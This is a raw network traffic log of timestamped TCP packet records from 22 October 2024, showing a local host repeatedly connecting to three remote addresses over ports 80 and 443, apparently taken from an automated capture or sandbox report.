                                                                                                                          Oct 22, 2024 16:12:00.712693930 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.712735891 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.712793112 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.712836981 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.712878942 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.712919950 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.712964058 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.713012934 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.713059902 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.713118076 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.713146925 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.713186026 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.713232994 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.713278055 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.828561068 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.828744888 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.828840971 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.828843117 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.828874111 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.828907013 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.828975916 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.828989029 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.829052925 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.829057932 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.829098940 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.829109907 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.829288960 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.829320908 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.829327106 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.829552889 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.829587936 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.829592943 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.829701900 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.829730034 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.829735994 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.829854012 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.829885006 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.829889059 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.830152035 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.830199957 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.830317020 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.871546984 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.871721983 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.871743917 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.872421980 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.876904011 CEST8049990193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.880763054 CEST4999080192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:00.886240005 CEST8049990193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.945624113 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.945786953 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.945882082 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.945888996 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.945921898 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.945955038 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.946026087 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.946033955 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.946122885 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.946152925 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.946158886 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.946182013 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.946234941 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.946239948 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.946307898 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.946312904 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.946388006 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.946393013 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.946652889 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.946683884 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.946691036 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.946758032 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.946763039 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.947026014 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.947120905 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.947151899 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.947158098 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.947196960 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.947263002 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.947298050 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.947302103 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.947341919 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.947432041 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.947436094 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.947500944 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.947560072 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.947622061 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.947628021 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.947923899 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.958947897 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.958972931 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:01.130698919 CEST8049990193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:01.180934906 CEST4999080192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:03.258141041 CEST4999180192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:03.263659954 CEST8049991193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:03.263741016 CEST4999180192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:03.264094114 CEST4999180192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:03.269732952 CEST8049991193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:03.634610891 CEST49992443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:03.634706020 CEST44349992188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:03.634800911 CEST49992443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:03.643184900 CEST49992443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:03.643225908 CEST44349992188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:04.101454973 CEST8049991193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:04.104168892 CEST4999180192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:04.110790014 CEST8049991193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:04.265017033 CEST44349992188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:04.265103102 CEST49992443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:04.268543959 CEST49992443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:04.268553972 CEST44349992188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:04.268975019 CEST44349992188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:04.272279978 CEST49992443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:04.319327116 CEST44349992188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:04.358023882 CEST8049991193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:04.416515112 CEST44349992188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:04.416743994 CEST44349992188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:04.416878939 CEST49992443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:04.421454906 CEST49992443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:04.430615902 CEST4999080192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:04.437186956 CEST8049990193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:04.537982941 CEST4999180192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:04.684355021 CEST8049990193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:04.686670065 CEST49993443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:04.686717033 CEST44349993188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:04.687047958 CEST49993443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:04.687047958 CEST49993443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:04.687086105 CEST44349993188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:04.725699902 CEST4999080192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:04.850974083 CEST49994443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:04.851010084 CEST44349994188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:04.851181984 CEST49994443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:04.853161097 CEST49994443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:04.853172064 CEST44349994188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:05.300440073 CEST44349993188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:05.302887917 CEST49993443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:05.302937984 CEST44349993188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:05.444885015 CEST44349993188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:05.444968939 CEST44349993188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:05.446901083 CEST49993443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:05.450777054 CEST49993443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:05.484561920 CEST44349994188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:05.484687090 CEST49994443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:05.494785070 CEST49994443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:05.494812965 CEST44349994188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:05.495867968 CEST44349994188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:05.505033970 CEST49994443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:05.547352076 CEST44349994188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:05.571572065 CEST4999080192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:05.574790955 CEST4999580192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:05.577647924 CEST8049990193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:05.577914953 CEST4999080192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:05.580213070 CEST8049995193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:05.582865000 CEST4999580192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:05.590776920 CEST4999580192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:05.596412897 CEST8049995193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:05.644999981 CEST44349994188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:05.645221949 CEST44349994188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:05.646785975 CEST49994443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:05.761271000 CEST49994443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:05.786778927 CEST4999180192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:05.792152882 CEST8049991193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:06.034399986 CEST8049991193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:06.037790060 CEST49996443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:06.037841082 CEST44349996188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:06.037913084 CEST49996443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:06.038499117 CEST49996443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:06.038511992 CEST44349996188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:06.084841967 CEST4999180192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:06.422159910 CEST8049995193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:06.423546076 CEST49997443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:06.423578024 CEST44349997188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:06.423661947 CEST49997443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:06.423917055 CEST49997443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:06.423938036 CEST44349997188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:06.475476980 CEST4999580192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:06.659236908 CEST44349996188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:06.660836935 CEST49996443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:06.660866976 CEST44349996188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:06.804373980 CEST44349996188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:06.804630041 CEST44349996188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:06.804789066 CEST49996443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:06.805188894 CEST49996443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:06.807883978 CEST4999180192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:06.809154987 CEST4999880192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:06.813982964 CEST8049991193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:06.814043045 CEST4999180192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:06.814760923 CEST8049998193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:06.814842939 CEST4999880192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:06.814937115 CEST4999880192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:06.820483923 CEST8049998193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:07.035191059 CEST44349997188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:07.038369894 CEST49997443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:07.038397074 CEST44349997188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:07.190934896 CEST44349997188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:07.191015959 CEST44349997188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:07.191179037 CEST49997443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:07.191507101 CEST49997443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:07.194279909 CEST4999580192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:07.195466042 CEST4999980192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:07.200604916 CEST8049995193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:07.201030970 CEST8049999193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:07.201109886 CEST4999580192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:07.201124907 CEST4999980192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:07.201246977 CEST4999980192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:07.207135916 CEST8049999193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:07.657674074 CEST8049998193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:07.662859917 CEST50000443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:07.662904978 CEST44350000188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:07.663103104 CEST50000443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:07.663381100 CEST50000443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:07.663388968 CEST44350000188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:07.709863901 CEST4999880192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:08.049173117 CEST8049999193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:08.050430059 CEST50001443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:08.050538063 CEST44350001188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:08.050631046 CEST50001443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:08.050839901 CEST50001443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:08.050868988 CEST44350001188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:08.100608110 CEST4999980192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:08.275823116 CEST44350000188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:08.278425932 CEST50000443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:08.278451920 CEST44350000188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:08.428664923 CEST44350000188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:08.428914070 CEST44350000188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:08.429249048 CEST50000443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:08.436731100 CEST50000443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:08.510706902 CEST5000280192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:08.517021894 CEST8050002193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:08.517293930 CEST5000280192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:08.517466068 CEST5000280192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:08.523854971 CEST8050002193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:08.670223951 CEST44350001188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:08.725483894 CEST50001443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:08.739703894 CEST50001443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:08.739722967 CEST44350001188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:08.884283066 CEST44350001188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:08.884382963 CEST44350001188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:08.884480000 CEST50001443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:08.901526928 CEST50001443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:08.952915907 CEST5000380192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:08.958461046 CEST8050003193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:08.958542109 CEST5000380192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:08.958656073 CEST5000380192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:08.963890076 CEST8050003193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:09.359898090 CEST8050002193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:09.361068964 CEST50004443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:09.361109972 CEST44350004188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:09.361223936 CEST50004443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:09.361483097 CEST50004443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:09.361499071 CEST44350004188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:09.412988901 CEST5000280192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:09.804703951 CEST8050003193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:09.806303024 CEST50005443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:09.806356907 CEST44350005188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:09.806467056 CEST50005443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:09.806885958 CEST50005443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:09.806894064 CEST44350005188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:09.850497007 CEST5000380192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:09.974742889 CEST44350004188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:09.976558924 CEST50004443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:09.976572037 CEST44350004188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:10.118865967 CEST44350004188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:10.118988037 CEST44350004188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:10.119054079 CEST50004443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:10.119566917 CEST50004443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:10.122391939 CEST5000280192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:10.123816967 CEST5000680192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:10.129034042 CEST8050002193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:10.129103899 CEST5000280192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:10.129674911 CEST8050006193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:10.129729986 CEST5000680192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:10.129796982 CEST5000680192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:10.136109114 CEST8050006193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:10.406014919 CEST44350005188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:10.408026934 CEST50005443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:10.408077002 CEST44350005188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:10.556885004 CEST44350005188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:10.556996107 CEST44350005188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:10.557151079 CEST50005443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:10.557461023 CEST50005443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:10.561295986 CEST5000380192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:10.562426090 CEST5000780192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:10.566984892 CEST8050003193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:10.567054033 CEST5000380192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:10.567733049 CEST8050007193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:10.567804098 CEST5000780192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:10.567869902 CEST5000780192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:10.573442936 CEST8050007193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:10.967521906 CEST8050006193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:10.968943119 CEST50008443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:10.968982935 CEST44350008188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:10.969429016 CEST50008443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:10.969429016 CEST50008443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:10.969472885 CEST44350008188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:11.022770882 CEST5000680192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:11.393496037 CEST8050007193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:11.396476984 CEST50009443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:11.396542072 CEST44350009188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:11.396641016 CEST50009443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:11.396985054 CEST50009443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:11.397006035 CEST44350009188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:11.445970058 CEST5000780192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:11.601047993 CEST44350008188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:11.602783918 CEST50008443192.168.2.6188.114.97.3
                                                                                                                          Oct 22, 2024 16:12:11.602823019 CEST44350008188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:11.745990992 CEST44350008188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:11.746087074 CEST44350008188.114.97.3192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:11.746278048 CEST50008443192.168.2.6188.114.97.3
